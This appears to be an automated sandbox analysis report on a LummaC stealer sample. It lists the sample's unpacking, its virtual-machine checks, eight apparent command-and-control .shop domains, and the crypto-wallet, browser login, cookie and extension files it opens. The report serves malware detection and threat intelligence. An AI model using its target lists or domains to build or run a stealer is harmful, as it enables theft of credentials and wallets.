            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3916
            Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\d65c73f1-2594-4da1-9550-dde500f36ea8Jump to behavior
            Source: rdFy6abQ61.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: rdFy6abQ61.exe, 00000000.00000003.1685915569.0000000002E65000.00000004.00000800.00020000.00000000.sdmp, rdFy6abQ61.exe, 00000000.00000003.1698922197.0000000002E47000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: rdFy6abQ61.exeReversingLabs: Detection: 39%
            Source: rdFy6abQ61.exeVirustotal: Detection: 48%
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile read: C:\Users\user\Desktop\rdFy6abQ61.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\rdFy6abQ61.exe "C:\Users\user\Desktop\rdFy6abQ61.exe"
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3916 -s 1856
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeSection loaded: msimg32.dllJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeSection loaded: msvcr100.dllJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeSection loaded: webio.dllJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

            Data Obfuscation

            barindex
            Detected unpacking (changes PE section rights)
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeUnpacked PE file: 0.2.rdFy6abQ61.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
            Detected unpacking (overwrites its own PE header)
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeUnpacked PE file: 0.2.rdFy6abQ61.exe.400000.0.unpack
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_004499A1 push esp; ret 0_2_004499A2
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_0044AAD0 push ecx; retn 0041h0_2_0044AAD5
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_005E30C7 push 0F56897Eh; iretd 0_2_005E30DF
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_005E2361 push 00000004h; ret 0_2_005E2375
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_005E646F push ebp; ret 0_2_005E6470
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_005E3CDA push esi; retn 001Ch0_2_005E3CDE
            Source: rdFy6abQ61.exeStatic PE information: section name: .text entropy: 7.828452580141766
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe TID: 5900Thread sleep time: -120000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
            Source: Amcache.hve.3.drBinary or memory string: VMware
            Source: Amcache.hve.3.drBinary or memory string: VMware Virtual USB Mouse
            Source: Amcache.hve.3.drBinary or memory string: vmci.syshbin
            Source: Amcache.hve.3.drBinary or memory string: VMware, Inc.
            Source: Amcache.hve.3.drBinary or memory string: VMware20,1hbin@
            Source: Amcache.hve.3.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
            Source: Amcache.hve.3.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
            Source: Amcache.hve.3.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
            Source: rdFy6abQ61.exe, 00000000.00000003.1685024723.00000000006AF000.00000004.00000020.00020000.00000000.sdmp, rdFy6abQ61.exe, 00000000.00000002.1878209398.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, rdFy6abQ61.exe, 00000000.00000002.1878209398.000000000066A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: Amcache.hve.3.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
            Source: rdFy6abQ61.exe, 00000000.00000003.1685024723.00000000006AF000.00000004.00000020.00020000.00000000.sdmp, rdFy6abQ61.exe, 00000000.00000002.1878209398.00000000006AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW,
            Source: Amcache.hve.3.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
            Source: Amcache.hve.3.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
            Source: Amcache.hve.3.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
            Source: Amcache.hve.3.drBinary or memory string: vmci.sys
            Source: Amcache.hve.3.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
            Source: Amcache.hve.3.drBinary or memory string: vmci.syshbin`
            Source: Amcache.hve.3.drBinary or memory string: \driver\vmci,\driver\pci
            Source: Amcache.hve.3.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
            Source: Amcache.hve.3.drBinary or memory string: VMware20,1
            Source: Amcache.hve.3.drBinary or memory string: Microsoft Hyper-V Generation Counter
            Source: Amcache.hve.3.drBinary or memory string: NECVMWar VMware SATA CD00
            Source: Amcache.hve.3.drBinary or memory string: VMware Virtual disk SCSI Disk Device
            Source: Amcache.hve.3.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
            Source: Amcache.hve.3.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
            Source: Amcache.hve.3.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
            Source: Amcache.hve.3.drBinary or memory string: VMware PCI VMCI Bus Device
            Source: Amcache.hve.3.drBinary or memory string: VMware VMCI Bus Device
            Source: Amcache.hve.3.drBinary or memory string: VMware Virtual RAM
            Source: Amcache.hve.3.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
            Source: Amcache.hve.3.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeAPI call chain: ExitProcess graph end nodegraph_0-24908
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_00442080 LdrInitializeThunk,0_2_00442080
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_005E0083 push dword ptr fs:[00000030h]0_2_005E0083
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_020E092B mov eax, dword ptr fs:[00000030h]0_2_020E092B
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_020E0D90 mov eax, dword ptr fs:[00000030h]0_2_020E0D90

            HIPS / PFW / Operating System Protection Evasion

            barindex
            LummaC encrypted strings found
            Source: rdFy6abQ61.exeString found in binary or memory: cloudewahsj.shop
            Source: rdFy6abQ61.exeString found in binary or memory: rabidcowse.shop
            Source: rdFy6abQ61.exeString found in binary or memory: noisycuttej.shop
            Source: rdFy6abQ61.exeString found in binary or memory: tirepublicerj.shop
            Source: rdFy6abQ61.exeString found in binary or memory: framekgirus.shop
            Source: rdFy6abQ61.exeString found in binary or memory: wholersorie.shop
            Source: rdFy6abQ61.exeString found in binary or memory: abruptyopsn.shop
            Source: rdFy6abQ61.exeString found in binary or memory: nearycrepso.shop
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: Amcache.hve.3.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
            Source: Amcache.hve.3.drBinary or memory string: msmpeng.exe
            Source: Amcache.hve.3.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
            Source: Amcache.hve.3.drBinary or memory string: MsMpEng.exe

            Stealing of Sensitive Information

            barindex
            Yara detected LummaC Stealer
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
            Source: Yara matchFile source: Process Memory Space: rdFy6abQ61.exe PID: 3916, type: MEMORYSTR
            Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
            Found many strings related to Crypto-Wallets (likely being stolen)
            Source: rdFy6abQ61.exe, 00000000.00000002.1878209398.00000000006AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Electrum-LTC\wallets
            Source: rdFy6abQ61.exe, 00000000.00000002.1878209398.00000000006AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\ElectronCash\wallets
            Source: rdFy6abQ61.exe, 00000000.00000002.1878209398.00000000006AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/JAXX New Version
            Source: rdFy6abQ61.exe, 00000000.00000002.1878209398.00000000006AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
            Source: rdFy6abQ61.exe, 00000000.00000002.1878209398.00000000006AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
            Source: rdFy6abQ61.exe, 00000000.00000003.1714698948.0000000002E46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ExodusWeb3s=:
            Source: rdFy6abQ61.exe, 00000000.00000002.1878209398.00000000006AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
            Source: rdFy6abQ61.exe, 00000000.00000002.1878209398.00000000006AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
            Source: rdFy6abQ61.exe, 00000000.00000002.1878209398.00000000006E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
